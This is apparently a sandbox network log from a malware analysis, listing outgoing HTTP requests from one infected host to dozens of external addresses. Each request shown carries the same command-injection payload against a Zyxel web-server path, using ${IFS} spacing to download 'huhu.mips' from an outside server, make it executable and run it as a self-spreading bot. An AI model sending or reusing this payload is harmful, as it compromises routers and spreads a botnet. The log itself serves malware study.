                                                  Jan 19, 2024 18:23:42.777743101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1189192.168.2.13578362.222.35.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777813911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1190192.168.2.133796061.199.177.205443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777864933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1191192.168.2.1351984142.78.102.194443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777905941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192192.168.2.1336888149.9.211.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777946949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1193192.168.2.13585844.128.129.220443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.777981997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1194192.168.2.134263454.197.76.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778023958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1195192.168.2.133388014.169.203.39443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778069973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1196192.168.2.134286243.250.21.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778115988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1197192.168.2.1353024197.87.43.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778156042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1198192.168.2.1335564194.78.251.24443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778203011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1199192.168.2.1342652140.252.135.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778243065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1200192.168.2.1352260122.183.84.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778284073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1201192.168.2.1338862179.135.250.1443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778331041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1202192.168.2.1359240105.245.4.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778378010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1203192.168.2.1340356218.178.42.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778419018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1204192.168.2.1345080190.141.170.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778448105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1205192.168.2.134595292.156.123.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778506041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1206192.168.2.1346232187.170.51.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778549910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1207192.168.2.1350908157.123.205.58443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778704882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1208192.168.2.1343962113.65.157.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778737068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1209192.168.2.135601220.46.238.190443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778772116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1210192.168.2.1337738212.251.10.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778805971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1211192.168.2.136072412.38.110.247443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778862000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1212192.168.2.1335992144.251.78.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778909922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1213192.168.2.134019668.221.200.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778928041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1214192.168.2.134763218.16.157.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.778970957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1215192.168.2.135000044.139.65.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779017925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1216192.168.2.1360858147.184.9.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779063940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1217192.168.2.1352924175.42.50.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779092073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1218192.168.2.134832637.231.128.128443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779134989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1219192.168.2.1333078134.231.53.63443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779170036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1220192.168.2.1349860122.112.137.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779226065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1221192.168.2.1332870151.56.68.86443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779266119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1222192.168.2.1336522110.96.62.255443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779304028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1223192.168.2.1344116212.39.13.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779342890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1224192.168.2.135571093.122.24.224443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779393911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1225192.168.2.135923266.124.168.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779408932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1226192.168.2.1357054126.167.17.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779469013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1227192.168.2.134026641.5.8.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779512882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1228192.168.2.13534029.130.237.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779546022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1229192.168.2.135884091.85.223.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779586077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1230192.168.2.1346086103.119.220.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779627085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1231192.168.2.133329839.25.216.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779652119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1232192.168.2.1343732123.250.235.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779680014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1233192.168.2.1342380219.63.166.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779738903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1234192.168.2.135486895.63.88.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779773951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1235192.168.2.1334720117.50.9.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779820919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1236192.168.2.1346196181.200.13.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779860020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1237192.168.2.1355190112.194.105.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779917955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1238192.168.2.135273263.35.246.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779969931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1239192.168.2.134358850.237.42.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.779983997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1240192.168.2.1358438200.80.135.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780010939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1241192.168.2.1338322157.253.198.45443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780061960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1242192.168.2.135360063.28.135.29443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780096054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1243192.168.2.1344894118.201.156.164443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780148029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1244192.168.2.13464505.137.75.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780174971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1245192.168.2.1352510166.207.68.238443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780224085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1246192.168.2.1352656143.247.19.30443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780258894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1247192.168.2.133971291.139.212.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780293941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1248192.168.2.1342044122.175.161.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780342102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1249192.168.2.1348610134.14.130.248443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780371904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1250192.168.2.13544169.69.183.184443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:42.780405045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1251192.168.2.1358264113.187.222.166443
                                                  TimestampBytes transferredDirectionData
